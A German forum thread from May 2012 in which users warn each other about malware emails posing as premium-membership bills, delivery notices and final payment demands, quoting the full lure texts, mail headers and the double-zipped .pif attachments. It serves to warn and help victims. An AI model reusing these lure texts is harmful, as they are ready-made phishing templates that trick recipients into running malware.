Jäger GmbH
Billufer 11
77309 Keiserslauter

Telefon: (+49) 540 9302353
(Mo-Fr 8.00 bis 19.00 Uhr, Sa 9.00 bis 19.00 Uhr)
Gesellschaftssitz ist Alsfeld
Umsatzsteuer-ID: DE393469115
Geschäftsfuehrer: ***

Was ich gefunden habe: einen Webshop mit dem namen Mall73, gibt es tatsächlich.
Jäger GmbH's gibts auch mehrere.
Von der Zip Datei werde ich gepflegt die Finger lassen.
Web.de erkennt aktuell die Mail als Spam, aber die Zipdatei, wird als sauber angezeigt.
Trotzdem sollte sich jeder Hütten das Teil zu öffnen.

katermerlin
18.05.2012, 14:33
Heute hab ich eine Email mit einem Anhang "Mitgliedschaft.zip", die eine Datei "Mitgliedschaft Mai 2012.pif" enthält (weiter unten dann der Quelltext des Headers). Ich hab mich natürlich gehütet, die Datei zu öffnen, hab aber mit einem Viewer in die zip.-Datei geschaut. Im Quelltext hab ich meine persönlichen Infos mit "§" ersetzt.
Kennt das jemand?
Hier ein anderes Opfer mit ähnlichem Text:
http://www.sellerforum.de/internet-sicherheit-f56/virus-in-zip-anhang-bei-angeblicher-premium-mitgli-t27180.html

Hier der Originaltext meiner Mail:



Guten Tag sehr geehrter Kunde,

Sie haben heute bei TrefflichTropfen die Premiummitgliedschaft gekauft. Die Zahlung in Höhe von 288,59 EUR wird in den kommenden Tagen von Ihrem Bankkonto entzogen.

Sie sind jetzt für die nachfolgenden 6 Monate Star-Kunde und können in vollem Umfang die Premiumleistungen nutzen.

Zahlungsdetails sind zwecks Vorsichtsmassnahmen laut dem §§ 3g, 5b BDSG, aus der beigefügter Datei zu konrollieren.
Die Kündigung der Extradienste, ist mit der in Beilage angefügten Stornierung an Robin [at] Schwarz-anwalt.ch zu mailen.

Ihr Kundensupport

Lehmann GmbH
Blostwiete 09
67513 Kiel

Tel.: (+49) 305 72351917
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 9.00 bis 17.00 Uhr)
Ort: Aurich
Steuer-ID: DE976639447 Geschäftsfuehrer: ***


Qeulltext:

From - Fri May 18 11:26:38 2012
X-Account-Key: account10
X-UIDL: 0MeRxv-1SjjLz32IJ-00PfD6
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <svalderr [at] aecom.yu.edu>
Delivery-Date: Fri, 18 May 2012 07:17:21 +0200
Received-SPF: pass (mxbap1: domain of aecom.yu.edu designates 129.98.1.51 as permitted sender) client-ip=129.98.1.51; envelope-from=svalderr [at] aecom.yu.edu; helo=mx1.aecom.yu.edu;
Received: from mx1.aecom.yu.edu (mx1.aecom.yu.edu [129.98.1.51])
by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis)
id 0MeRxv-1SjjLz32IJ-00PfD6 for §§§§§§§§§§§@§§§§§§.de; Fri, 18 May 2012 07:17:21 +0200
Received: from draco.aecom.yu.edu (draco.aecom.yu.edu [129.98.1.160])
by mx1.aecom.yu.edu (Postfix) with ESMTP id B1A349F0071
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 01:17:19 -0400 (EDT)
X-AuditID: 816201a0-99b52bb00000156a-e5-4fb5db5f64db
Received: from smtp2.aecom.yu.edu (smtp2.aecom.yu.edu [129.98.1.62])
by draco.aecom.yu.edu (Symantec Mail Security) with ESMTP id 031AE718002
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 01:17:19 -0400 (EDT)
Received: from server.KAMINASSOCIATES.LOCAL (adsl-074-165-000-251.sip.asm.bellsouth.net [74.165.0.251])
(using TLSv1 with cipher RC4-MD5 (128/128 bits))
(No client certificate requested)
by smtp2.aecom.yu.edu (Postfix) with ESMTP id A19961760F7
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 01:17:00 -0400 (EDT)
MIME-Version: 1.0
Date: Fri, 18 May 2012 01:15:29 -0400
X-Priority: 3 (Normal)
X-Mailer: Apple Mail (2.552)
Subject: Re: Registrierung Neuer Premiummitgliedschaft Id 799937829
From: svalderr [at] aecom.yu.edu
To: §§§§§§§§§§§@§§§§§§.de
Content-Type: multipart/mixed;
boundary="-----_chilkat_10b_ceb4_6b56bc0a.6864bc79_.MIX"
Message-ID: <CHILKAT-MID-0c194b6f-cd99-3174-d392-e3ae8e7e5a6e [at] server.KAMINASSOCIATES.LOCAL>
X-Brightmail-Tracker: AAAAAA==
X-UI-Loop: V01:285lY/X20jY=:RVsTsqukg0YURt5ziWFYjiQwVBoaNYUrD1vHL2TWyPk=
Envelope-To: §§§§§§§§§§§@§§§§§§.de
X-Antivirus: avast! (VPS 120517-1, 17.05.2012), Inbound message
X-Antivirus-Status: Clean

This is a multi-part message in MIME format.



[Zweites Vollzitat des Mailtextes vom Moderator entfernt]
-------_chilkat_10b_ceb4_6b56bc0a.6864bc79_.MIX
Content-Type: application/zip;
name="Mitgliedschaft.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Mitgliedschaft.zip"

Mittwoch
18.05.2012, 14:51
Definitiv Virus, oder genauer gesagt Trojaner. Über die Masche gibt es bereits ein Thema, an das ich Deinen Beitrag gleich antackere.

Läuft bei Dir Windows? Wenn ja: Bitte trenne Deinen Computer umgehend vom Internet und prüfe Dein Betriebssystem auf Schädlinge. Die können sich auch einnisten, wenn man nur die ZIP-Datei öffnet. Ansonsten kannst Du alles Wichtige weiter oben in diesem Thema nachlesen.

Schönen Gruß
Mittwoch

katermerlin
18.05.2012, 15:38
Ja, ich hab Vista.
Der Virenscanner bemängelt auch den inhalt (Mitgliedschaft Mai 2012.pif) nicht...
Jetzt mach ich noch mit Hijackthis...

Gruß
Wolfgang

schara56
18.05.2012, 20:11
Ja, die feuern derzeit aus allen Rohren:
Received: from gateway03.websitewelcome.com (EHLO gateway03.websitewelcome.com) [67.18.34.23]
by mx0.gmx.net (mx059) with SMTP; 18 May 2012 08:00:20 +0200
Received: by gateway03.websitewelcome.com (Postfix, from userid 5007)
id 468B46452B80F; Fri, 18 May 2012 01:00:18 -0500 (CDT)
Received: from gator717.hostgator.com (gator717.hostgator.com [174.132.170.98])
by gateway03.websitewelcome.com (Postfix) with ESMTP id 037CC6452AAAC
for <x>; Fri, 18 May 2012 01:00:18 -0500 (CDT)
Received: from [69.21.94.154] (port=28263 helo=SERVER.smallbusiness.local)
by gator717.hostgator.com with esmtpsa (TLSv1:RC4-MD5:128)
(Exim 4.69)
(envelope-from <jeremy [at] make-penis-bigger-exercises.com>)
id 1SVGER-0006sL-7c; Fri, 18 May 2012 01:00:07 -0500
Die Absende-IP ist derzeit in 5 Blocklisten enthalten:

cblless.anti-spam.org.cn (127.0.8.5)
cblplus.anti-spam.org.cn (127.0.8.6)
bl.nszones.com (127.0.0.2)
list.quorum.to (127.0.0.2)
Project Honeypot (127.73.13.1)

Katzina
19.05.2012, 00:37
@ truelife

Vielen Dank, truelife, ich habe mir die Downloadseite angschaut, die Du vorgeschlagen hast, aber bei meinen Kenntnissen habe ich da großes Bedenken, daß ich bei der Programmausführung vieles falsch machen könnte, es sind auch so viele Fachausdrücke für mich drin, sorry.
Ich hatte mal meinen Rechner mit dem Programm "spybot -search und destroy" durchsuchen lassen, der fand zwei Cookies bei den Internetbrowsern "Explorer und Chrom" - die habe ich gelöscht. Danach lief er im grünen Bereich. Ob diese Atkion ausgereicht hat?? Was meinst Du?
Vielen Dank für die Mühe,
Katzina

Gaia
19.05.2012, 01:14
Spybot S&D reicht net aus, die Anleitung von Hijackthis ist schon sehr verständlich und falsch machen kann man da wenig. Du kannst Dir von den Moderatoren bei protecus.de helfen lassen, melde Dich im Forum da an und gehe mit den Usern und Moderatoren die Anleitung durch. Ich spreche da aus eigenen Erfahrungen und Du kannst auch Deinen Rechner von einem Online-Scanner auf Viren und Malware prüfen lassen. Viele der grossen Hersteller haben auf ihren Websites Online-Scanner.

lG Gaia

katermerlin
19.05.2012, 10:56
Der Hijackthis hat mir keine weitern Erkenntnisse gebracht zu dem Thema, offenbar bin ich von einer Infektion verschont geblieben.
Interessieren tät mich, was das für ein Virus / Trojaner ist und was der macht. Den Anhang hab ich noch hier, wem könnte ich das zur Analyse schicken?

LG
Wolfgang

Mittwoch
19.05.2012, 13:28
Interessieren tät mich, was das für ein Virus / Trojaner ist und was der macht. Den Anhang hab ich noch hier, wem könnte ich das zur Analyse schicken?
Ich könnte das nicht besser als Wikipedia zusammenfassen, daher verlinke ich einfach dorthin:
http://de.wikipedia.org/wiki/Computervirus
http://de.wikipedia.org/wiki/Computerwurm
http://de.wikipedia.org/wiki/Trojanisches_Pferd_(Computerprogramm) (http://de.wikipedia.org/wiki/Trojanisches_Pferd_%28Computerprogramm%29)
Bei der hier diskutierten Masche geht es vermutlich darum, neue Rechner für ein sog. Botnetz zu infizieren. Was ein Botnetz ist, kannst Du im Antispam-Wiki nachlesen, wenn Du eben gesetzten dem Link folgst. Ein Rechner, der mittels Trojaner infiziert wurde, heißt im Netzjargon Zombie.

Du kannst Dateien, bei denen Du Dir nicht sicher bist, ob sie sicher sind, neben einem lokalen Virenscanner auch einem Online-Virenscanner zu fressen geben. Letztere werden häufig von großen Herstellern von Antivirensoftware angeboten. Dieses Angebot hat für die Hersteller den Nutzen, sehr zeitnah an neue Viren, Würmer oder Trojaner zu kommen, die bislang noch unentdeckt waren. Ich persönlich nutze VirusTotal (https://www.virustotal.com/de/) sehr gerne, es gibt aber auch noch andere Anbieter, die man schnell findet, wenn man "Online Virenscanner" in die Suchmaschine des eigenen Vertrauens eingibt.

Schönen Gruß
Mittwoch

katermerlin
19.05.2012, 15:28
Seit gestern wird der Trojaner von AVAST erkant. Es handelt sich um einen
Win32:Karagany-HB (Troj)
Downloader...
Auch Virustotal (finde ich auch ausgezeichnet) konnte diesen identifizieren.

Vielen Dank für euere Beiträge.

Gruß
Wolfgang

deekay
21.05.2012, 12:23
Heute ist diese Art Mail schon dreimal hier aufgeschlagen...

xOAnnAOx
21.05.2012, 23:56
Guten Abend Leute,

ich hab auch diese mails bekommen sogar 2-mal. Jetz hätte ich da aber noch eine Frage ich war so blöd und hab auf diese Exe bzw Zip datei drauf geklickt jedoch hat mein kaspersky mir den zugriff verweigert. Das bedeutet ja dann das mein Computer weiterhin sicher ist ? Oder täusch ich mich da jetz, weil ich konnts ja nicht öffnen und Das Viren programm hat es gleich auf isolation gesetzt ? Weil ich und meine Eltern eben das Online Banking benutzen, nicht das jetz diese Leute da an unsere Bankddaten kommen können. Ich hoffe ihr könnt mir helfen.

LG

Mittwoch
22.05.2012, 09:46
Jetz hätte ich da aber noch eine Frage ich war so blöd und hab auf diese Exe bzw Zip datei drauf geklickt jedoch hat mein kaspersky mir den zugriff verweigert. Das bedeutet ja dann das mein Computer weiterhin sicher ist?
Kaspersky ist bekannt dafür, Computerschädlinge relativ schnell nach ihrem ersten auftreten identifizieren zu können. Wenn Dein Virenscanner mehrmals täglich die jeweiligen Updates lädt, kannst Du mit hoher Wahrscheinlichkeit davon ausgehen, dass Du vor Schlimmerem bewahrt wurdest. Hundertprozentige Gewissheit kann man aber nur dann haben, wenn man nicht auf Dateianhänge aus unbekannten Quellen klickt. Und wenn man neben der Virensoftware auch das Betriebssystem mit den aktuellsten Patches versorgt.

Der beste Schutz vor Computerschädlingen sitzt vor dem Rechner. Wenn man mit gesundem, weitgehendem Misstrauen surft, sollte eine Rechnung einer Firma, die man nicht kennt und bei der man folglich auch noch nie etwas bestellt hat, schon stutzig machen. Wenn ich Dir auf der Straße einen Briefumschlag in die Hand drücke und dann sage: "Da ist eine Rechnung drin, nun zahl gefälligst." – Würdest Du den Umschlag öffnen? Eine kurze Recherche mit einer Suchmaschine hilft bei solchen Angriffen ganz gut, denn mittlerweile gibt es diverse aktuelle Warnungen im Netz.

Schönen Gruß
Mittwoch

homer
22.05.2012, 10:21
Mittlerweile kommen die Dinger mit doppelt gezippte, verschlüsselten Attachments daher. Allerdings ist der Anhang irgendwie falsch gepackt und ich komm nicht an den Inhalt ran.


Return-Path: <lrl [at] liquidcompass.net>
Received: from unknown (HELO inbound.appriver.com) (207.97.230.34)
by 0 with ESMTPS (DES-CBC3-SHA encrypted); 22 May 2012 03:XX:XX -0000
Received-SPF: none (0: domain at liquidcompass.net does not designate permitted sender hosts)
Received: from [71.249.217.77] (HELO server)
by inbound.appriver.com (CommuniGate Pro SMTP 5.4.4)
with ESMTP id X for me [at] work; Mon, 21 May 2012 23:XX:XX -0400
MIME-Version: 1.0
Date: Mon, 21 May 2012 23:XX:XX -0400
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: =?iso-8859-1?Q?deine_Lieferbest=E4tigung_1234567890_?=
From: lrl [at] liquidcompass.net
To: me [at] work
Content-Type: multipart/mixed;
boundary="-----_X.MIX"
Message-ID: <CHILKAT-MID-X [at] server>



Guten Tag,

unser Versandpartner hat Ihre Bestellung mit der Bestell Nummer 1234567890 zum Versand an Hermes Versand übergeben.

In der beigefügten Datei befindet sich die Abrechnung und die Zustelladresse als Doc Datei.
Die Rechnungsbestätigung wurde laut dem §§ 6e 2f um Ihre Privatsphäre zu schützen mit Ihrem persönlichen Kennwort verschlüsselt.

Ihr Passwort lautet# haus

Sie können die Abrechnung jederzeit selbständig über den online Shop ansehen.

Diese Angaben werden gebraucht:

- Email und die Bestellnummer bzw.
- die Auftrags-Nummer und die Serien-Nummer

Auftragsnummer: 1234567890
Geräte Serien-Nr.: 1234567890
Summe 581,64 EU

Die Buchung erfolgt in Die einigen Tagen von Ihrem Bank-Konto.

Ihr Auftrag ist hiermit fertig.

Mit besten Grüßen

Ihr Kundendienst

____________________________________
Daoku-Technik Online-Handel mit Sitz in Düsseldorf

Vorstand: J* B*, A* S*
Aufsichtsratsvorsitzender: E* G*
Amtsgericht: Potsdam 17870
_________

Frechdachs
22.05.2012, 10:44
Moin moin zusammen,

bei mir haben die auch grade versucht einen Virus o.ä. einzuschleusen.

Guten Morgen,

unser Postzentrum hat Ihre Bestellung mit der Bestell Nr. 96177005684 zur Lieferung an Die UPS übergeben.

Im Anhangsordner befindet sich die Rechnung und die Lieferadresse als Druck-Datei.
Die Rechnungsbestätigung wurde laut dem § 7e 3a aus Sicherheitsgründen mit einem unikaten Pin verschlüsselt.

Das Passwort----> haus


Sie dürfen die Abrechnung jederzeit selbst über online Webseite ansehen.

Diese Angaben werden benötigt:

- Ihre Email-Adresse und die Bestellnummer bzw.
- die Vertrags-Nr. und die Geräte-ID

Artikelnummer: 25794460725
Geräte Serien-Nr.: 49841566749
Buchungssumme 251,30 euro

Die Abrechnung erfolgt in Die einigen Tagen von Ihrem Onlinebank-Konto.

Ihr Auftrag ist hiermit fertiggestellt.

Mit besten Grüßen

Ihr Kundendienst

__________________________________
Peeto Elektronik Online-Shop mit Sitz in Hannover

Vorstand: Maria Haas, Karin Müller
Aufsichtsratsvorsitzender: Peter Wagner
Gesellschaftssitz: München 97921
_________________



Der Anhang lautet: 2012.zip und hat 37,0KB.
Return-Path: <SRS0=IvTJjF=DZ=merchantaccountetc.com=rick [at] eigbox.net>
Received: from bosmailout12.eigbox.net (bosmailout12.eigbox.net [66.96.190.12])
by mtain-md04.r1000.mx.aol.com (Internet Inbound) with ESMTP id 77A6B380001BC
for <Mailadresse [at] provider.de>; Mon, 21 May 2012 18:26:18 -0400 (EDT)
Received: from bosmailscan05.eigbox.net ([10.20.15.5])
by bosmailout12.eigbox.net with esmtp (Exim)
id 1SWb3S-0001E7-1V
for Mailadresse [at] provider.de; Mon, 21 May 2012 18:26:18 -0400
Received: from bosimpout01.eigbox.net ([10.20.55.1])
by bosmailscan05.eigbox.net with esmtp (Exim)
id 1SWb3R-0007Uc-DF
for Mailadresse [at] provider.de; Mon, 21 May 2012 18:26:17 -0400
Received: from bosauthsmtp14.eigbox.net ([10.20.18.14])
by bosimpout01.eigbox.net with NO UCE
id CmSH1j00K0JCtq201mSHjt; Mon, 21 May 2012 18:26:17 -0400
X-Authority-Analysis: v=2.0 cv=HfGjuF48 c=1 sm=1
a=JGEhlICRMeEpi/nAnxFwFQ==:17 a=ITbhAUetdq8A:10 a=cRiQlvaJGx8A:10
a=DqVHwcQmQ6QA:10 a=v4YTmEDuAAAA:8 a=NimMPD_XAAAA:8 a=QPcu4mC3AAAA:8
a=3oc9M9_CAAAA:8 a=baOGKXgQ6KSF8H3KA6wA:9 a=wPNLvfGTeEIA:10
a=nHFLwIULGSSbF11hAJoA:9 a=IKIoO-ieCDEA:10 a=AnsiuLKgxXFeB68GILQVjQ==:117
X-EN-OrigOutIP: 10.20.18.14
X-EN-IMPSID: CmSH1j00K0JCtq201mSHjt
Received: from bre75-1-78-192-242-228.fbxo.proxad.net ([78.192.242.228] helo=serv-ffp1.ffp.lan)
by bosauthsmtp14.eigbox.net with esmtpsa (TLSv1:RC4-MD5:128)
(Exim)
id 1SWb3Q-0001gO-U1
for Mailadresse [at] provider.de; Mon, 21 May 2012 18:26:17 -0400
MIME-Version: 1.0
Date: Tue, 22 May 2012 00:22:37 +0200
X-Priority: 3 (Normal)
X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10;
i686-pc-tommie-gnu)
Subject: Artikelerwerb 7322318062
From: rick [at] merchantaccountetc.com
To: Mailadresse [at] provider.de
Content-Type: multipart/mixed;
boundary="-----_chilkat_5c9_ca15_e7ec9850.62d08391_.MIX"
Message-ID: <CHILKAT-MID-0a050420-4b1f-3c79-6f2e-95d8c4153196 [at] serv-ffp1.ffp.lan>
X-EN-UserInfo: 117fac11fc4d8add5f506d21ba2ee0d4:68e300a672dc7ffa4cfe004fc759a8fb
X-EN-AuthUser: rick [at] merchantaccountetc.com
Sender: rick [at] merchantaccountetc.com
X-EN-OrigIP: 78.192.242.228
X-EN-OrigHost: bre75-1-78-192-242-228.fbxo.proxad.net
X-Originating-IP: 78.192.242.228
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/80909
X-AOL-VSS-CODE: scan_error
X-AOL-SCOLL-SCORE: 0:2:297912928:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-REROUTE: YES
x-aol-sid: 3039ac1d60584fbac10a70f5
X-AOL-IP: 66.96.190.12
X-AOL-SPF: domain : eigbox.net SPF : pass
X-Antivirus: avast! (VPS 120521-1, 21.05.2012), Inbound message
X-Antivirus-Status: Clean

Gruß Frechdachs

xOAnnAOx
22.05.2012, 21:42
Vielen Dank für die Info, das hat mir echt sehr weitergeholfen, hab aber auch nochmal zu Sicherheit den ganzen Laptop überprüfen lassen.

Gut das ich Kaspersky hab :D


LG Schönen Abend noch

thomas1611
23.05.2012, 07:12
Hier gleich aus aktellem Anlaß(neue befallene Kiste auf dem Tisch) neue Infos zum Schädling(neue Version)
- Entfernung immernoch genauso problemlos
- es werden eigene Dateien, sämtliche Bilddateien(also auch systemeigene), Mailfiles(Thunderbird uns Outlook) und auch Anwendungen verschlüsselt
- Verschlüsselung scheint bei jedem File anders zu sein - die bisher vorhandenen Tools zur Entschlüsselung funktionieren nicht
- Dateiname wird rein zufällig generiert und wird auch ab und an nicht geändert
- Extension ist immer weg

bei diesem Umfang der Verschlüsselung ist nur noch sauber Neuaufsetzen der einzig sinnvoll gangbare Weg.

kjz1
23.05.2012, 12:39
bei diesem Umfang der Verschlüsselung ist nur noch sauber Neuaufsetzen der einzig sinnvoll gangbare Weg.

Wohl dem, der über ein halbwegs aktuelles Image auf externer Platte verfügt.

deekay
23.05.2012, 21:26
Sie sind jetzt für die nächsten 9 Monate Premiumkunde und dürfen in vollen Umfang die Premiummöglichkeiten nutzen.
Entnehmen Sie die Vertragseinzeilheiten bitte der beigefügter Datei, dort finden Sie auch die Bestelldetails und Stardienstvorteile. Falls Sie die Starmitgliedschaft nicht mehr wollen, mailen Sie die Stornierung, mit der in dem zugefügten Ordner, beigelegten Stornierungserklärung.

Die versuchen ja mit immer tolleren Tricks die Leute dazu zu bewegen den Anhang zu öffnen

Gaia
23.05.2012, 22:26
Dabei schreckt schon die gruselige Rechtschreibung ab und sollte jeden hellhörig werden lassen den Anhang net zu öffnen.
Ausserdem das eigene Virenprogramm immer aktuell halten, so kann auch der Zugriff wie hier im Thread beschrieben, verweigert werden und schützt vor bösen Überraschungen.
Am besten fährt man, wenn man unbekannte e-Mails ungeöffnet löscht. Einen besseren Ratschlag gibt es net.

thomas1611
28.05.2012, 21:06
Die versuchen weiter den Druck zu erhöhen um ein öffnen zu provozieren


Sehr geehrte Damen und Herren,

in Bezug auf unsere Rechnung Nr.: 99172601 und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht beglichen ist. Dies bedeutet einen einseitigen Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht anmelden. Wir geben Ihnen jedoch trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 724.00 EURO an uns zur Zahlung bringen. Möglicherweise konnten wir Ihre Zahlung nicht zuordnen, weil z.B. der Verwendungszweck nicht korrekt angegeben wurde.

Die Bestelleinzelheiten und die Rechnung können Sie im zugefügtem Zip Ordner ansehen.

Nach geltendem Recht sind wir befugt, die anfallenden Kosten geltend zu machen. Alle bereits angefallenen und noch entstehenden Kosten (Mahnkosten, Rechtsanwalts- und Gerichtskosten) gehen zu Ihren Lasten.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag.



Neopu Elektro Aktiengesellschaft mit Sitz in Hamburg

Vorstand: A. S., M. P.
Aufsichtsratsvorsitzender: M. M.
Amtsgericht: Essen 02025


Return-Path: <john.milnes [at] btconnect.com>
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on

X-Spam-Level:
X-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00 autolearn=ham
version=3.2.5
X-Original-To:
Delivered-To:
Received: from mail.btconnect.com (c2bthomr13.btconnect.com [213.123.20.131])
by (Postfix) with ESMTP id D8B8C184FB
for <>; Mon, 28 May 2012 20:30:57 +0200 (CEST)
Received: from static-71-103-242-141.lsanca.dsl-w.verizon.net (EHLO dj-famous.dj.int) ([71.103.242.141])
by c2bthomr13.btconnect.com
with ESMTP id HRD20962 (AUTH john.milnes [at] btconnect.com);
Mon, 28 May 2012 19:30:55 +0100 (BST)
MIME-Version: 1.0
Date: Mon, 28 May 2012 11:30:34 -0700
X-Priority: 3 (Normal)
X-Mailer: Evolution/1.0-5mdk
Subject: Zahlungsaufforderung nach Vertragsbruch 23.05.2012
From: john.milnes [at] btconnect.com
To:
Content-Type: multipart/mixed;
boundary="-----_chilkat_3b8_0ace_e68daf51.053aa0ad_.MIX"
Message-ID: <CHILKAT-MID-ec49b591-7f2b-9adf-c283-2568d4b094f6 [at] dj-famous.dj.int>
X-Mirapoint-IP-Reputation: reputation=Neutral-1,
source=Queried,
refid=tid=0001.0A0B0301.4FC3C133.0087,
actions=tag
X-Junkmail-Premium-Raw: score=8/50,
refid=2.7.2:2012.5.28.173315:17:8.129,
ip=71.103.242.141,
rules=__MIME_VERSION,
DATE_TZ_NA,
__HAS_X_PRIORITY,
__HAS_X_MAILER,
NO_REAL_NAME,
__TO_MALFORMED_2,
__TO_NO_NAME,
__CT,
__CTYPE_HAS_BOUNDARY,
__CTYPE_MULTIPART,
__CTYPE_MULTIPART_MIXED,
__HAS_MSGID,
__SANE_MSGID,
ZIP_ATTACHED,
__ANY_URI,
__URI_NO_MAILTO,
__URI_NO_WWW,
__URI_NO_PATH,
SUPERLONG_LINE,
BODY_SIZE_10000_PLUS,
BODYTEXTP_SIZE_3000_LESS,
__RDNS_BROADBAND_3,
__RDNS_STATIC_1,
RDNS_GENERIC_POOLED,
HTML_00_01,
HTML_00_10,
RDNS_STATIC,
RDNS_BROADBAND,
RDNS_SUSP_SPECIFIC,
RDNS_SUSP
X-Junkmail-Status: score=10/50, host=c2bthomr13.btconnect.com
X-Junkmail-Signature-Raw: score=unknown,
refid=str=0001.0A0B0208.4FC3C45F.015F,ss=1,re=0.000,vtr=str,vl=0,fgs=0,
ip=71.103.242.141,
so=2011-07-25 19:15:43,
dmn=2011-05-27 18:58:46,
mode=multiengine
X-Junkmail-IWF: false


Anhang ist doppelt gepackt: inkasso.zip enthält abmahnung.zip, diese wiederum eine 52kb große "Verknüpfung mit einer Anwendung für MS-Dos" mit Namen "Letzte Abmahnung.pif"

NACHTRAG: Scheint wieder ne neue Version zu sein bei Virustotal sind 29 von 40 noch völlig blind - unter den Sehenden ist keiner der gebräuchlichen Verdächtigen

Preiti
28.05.2012, 23:43
Hallo Thomas1611 habe fast die selbe Nachricht wie Sie bekommen, ebenfalls ähnlich formuliert, da würde es auch nahe liegen, dass beide Mails vom selben Absender stammen.



x-store-info:sbevkl2QZR7OXo7WID5ZcVBK1Phj2jX/
Authentication-Results: hotmail.com; sender-id=none (sender IP is 208.76.80.175) header.from=jdbradshaw [at] otiso.com; dkim=none header.d=otiso.com; x-hmca=none
X-SID-PRA: jdbradshaw [at] otiso.com
X-DKIM-Result: None
X-Message-Status: n:0:n
X-SID-Result: None
X-AUTH-Result: NONE
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0w
X-Message-Info: NhFq/7gR1vRNrwoFQFkNLLppSlJ7E6Hu4JZPZ1cxT06AJVFmwv8hAAIv+PqRiJkVBklV0LlPp565TwcipVuJ+ 48knKd78tiCIdIhoSWzuSKJIAGqxsNu0taxuBz9soh5Pn2lprghMx2XWqBnFzc4kg==
Received: from xerxes.tchmachines.com ([208.76.80.175]) by SNT0-MC1-F24.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 25 May 2012 11:01:53 -0700
Received: from [194.46.61.178] (port=28022 helo=sbserver.sbs.local)
by xerxes.tchmachines.com with esmtpsa (TLSv1:RC4-MD5:128)
(Exim 4.77)
(envelope-from <jdbradshaw [at] otiso.com>)
id 1SXypd-0006PN-LH
for ..... [at] msn.com; Fri, 25 May 2012 14:01:49 -0400
MIME-Version: 1.0
Date: Fri, 25 May 2012 18:59:47 +0100
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
Subject: Zahlungsaufforderung nach Vertragsbruch 25.05.2012
From: jdbradshaw [at] otiso.com
To: .... [at] msn.com
Content-Type: multipart/mixed;
boundary="-----_chilkat_743_b139_6afd88f7.90e075a3_.MIX"
Message-ID: <CHILKAT-MID-379a3115-86d2-ce8b-b8f9-3e73ab153194 [at] sbserver.sbs.local>
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - xerxes.tchmachines.com
X-AntiAbuse: Original Domain - msn.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - otiso.com
Return-Path: jdbradshaw [at] otiso.com
X-OriginalArrivalTime: 25 May 2012 18:01:53.0788 (UTC) FILETIME=[77833BC0:01CD3AA0]

This is a multi-part message in MIME format.

-------_chilkat_743_b139_6afd88f7.90e075a3_.MIX
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-------_chilkat_743_b139_6afd88f7.90e075a3_.MIX
Content-Type: application/zip;
name="Mahnung.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Mahnung.zip"


Guten Tag,

in Bezug auf unsere Rechnung Nr.: 97394586 und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht ausgeglichen ist. Dies bedeutet einen einseitigen Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht anmelden. Wir geben Ihnen jedoch trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 942.00 EURO an uns zur Zahlung bringen.

Die Rechnung und die Bestelleinzelheiten finden Sie im Zusatzordner

Nach geltendem Recht sind wir befugt, die anfallenden Kosten geltend zu machen. Alle bereits angefallenen und noch entstehenden Kosten (Mahnkosten, Rechtsanwalts- und Gerichtskosten) gehen zu Ihren Lasten.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag!



Raese-Media Aktiengesellschaft mit Sitz in Hannover

Vorstand: J. L., W. P.
Aufsichtsratsvorsitzender: D. L.
Amtsgericht: Keiserslauter 11637

Der Anhang war auch wieder eine Zip-Datei mit: Mahnung.zip (38,1 KB)
wurde aber durch mein Virenprogramm (Avast) entdeckt: Mahnung.zip: In dieser Anlage wurde ein Virus entdeckt, der nicht beseitigt werden konnte. Die infizierte Anlage wurde aus Sicherheitsgründen gelöscht.

Diese Firma Raese-Media gibt es auch nicht.

Hippo
29.05.2012, 00:02
Das Ding kommt momentan mit allen möglichen Phantasiefirmennamen, aber immer mit dem gleichen Muster.
Komischerweise war dieser Satz

Die Rechnung und die Bestelleinzelheiten finden Sie im Zusatzordner
in allen praktisch gleichlautend enthalten

Preiti
29.05.2012, 00:21
Wie ist das eigentlich, sollte man solche Mails beim Bmi melden oder bringt das nichst?

Mittwoch
29.05.2012, 00:32
sollte man solche Mails beim Bmi melden oder bringt das nichst?
Was bitte hat das Bundesministerium des Innern damit zu tun?

